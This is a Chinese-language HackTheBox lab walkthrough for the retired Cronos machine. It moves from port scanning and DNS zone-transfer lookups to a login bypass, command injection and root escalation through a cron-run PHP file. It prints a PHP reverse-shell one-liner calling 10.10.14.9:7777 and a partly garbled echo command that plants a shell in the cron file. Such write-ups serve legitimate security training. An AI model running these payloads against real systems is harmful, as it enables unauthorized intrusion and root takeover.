HACKTHEBOX通关笔记——Cronos(退役)

开启环境,调试网络确保互联互通

HACKTHEBOX通关笔记——Cronos(退役)_第1张图片

拿到IP之后还是先来做一下端口扫描,nmap --rate-min=5000 -p-  -v ip,也可以加个-Pn做下禁ping扫描,当然这个速率很快,实际攻防时候加了pn参数也是容易被发现的,所以对抗时候还是要做IP代理扫描。

拿到端口信息后详细扫一下nmap -A -p22,80,53 -v ip

HACKTHEBOX通关笔记——Cronos(退役)_第2张图片

没发现什么可用信息,只好先从80入手,尝试访问发现是个默认页面,目录扫描也没什么成果,如果继续莽估计是不好说结果如何了,但是一定会浪费时间。而且这个比较蹊跷,平常都是IP域名信息都有,这次只有IP没有域名,不妨想想是不是遗漏了什么,

HACKTHEBOX通关笔记——Cronos(退役)_第3张图片

这时候想想还有一个53端口,关于dns服务,平常面试的时候考官会问问你,给个域名怎么反查IP,给个IP怎么看域名,听到比较多的就是windows就使用nslookup命令、linux使用dig命令,网页工具或者微步等等。

正向查询(通过域名查IP): 

nslookup 域名 要使用的DNS服务器

dig @DNS服务器 域名

dig @DNS服务器 axfr 域名(此命令通过axfr获取完整dns区域传送)

反向查询(通过IP查域名):

nslookup IP地址 要使用的DNS服务器

dig -x IP地址 @DNS服务器

先根据IP查询一下域名:

Nslookup 查询

HACKTHEBOX通关笔记——Cronos(退役)_第4张图片

Dig查询

HACKTHEBOX通关笔记——Cronos(退役)_第5张图片

获取到根域crons.htb,然后我们可以再进一步查询该根域名下是否还有子域名,这里也可以通过gobuster去爆破
HACKTHEBOX通关笔记——Cronos(退役)_第6张图片

访问测试,发现是一个登录框,简单尝试发现有万能密码漏洞

HACKTHEBOX通关笔记——Cronos(退役)_第7张图片

然后是一个路由探测的网页工具,抓包发现这里可以做命令执行,可以直接反弹shell,因为目录是个php文件,可以使用php去反弹。

HACKTHEBOX通关笔记——Cronos(退役)_第8张图片

HACKTHEBOX通关笔记——Cronos(退役)_第9张图片

写一下php反弹payload,注意bp里边执行需要做一下url编码:

php -r '$sock=fsockopen("10.10.14.9",7777);exec("sh <&3 >&3 2>&3");'

HACKTHEBOX通关笔记——Cronos(退役)_第10张图片

补齐ttyshell:python3 -c 'import pty;pty.spawn("/bin/bash")';

拿到基础flag,一般存放home下

HACKTHEBOX通关笔记——Cronos(退役)_第11张图片

提权查看计划任务,发现有一个www下一个php文件每分钟以root身份执行。

HACKTHEBOX通关笔记——Cronos(退役)_第12张图片

cp复制备份一下该文件,随后可以写一个反弹shell的马子

echo '&3 2>&3"); ?>' > artisan

HACKTHEBOX通关笔记——Cronos(退役)_第13张图片

HACKTHEBOX通关笔记——Cronos(退役)_第14张图片

你可能感兴趣的:(笔记)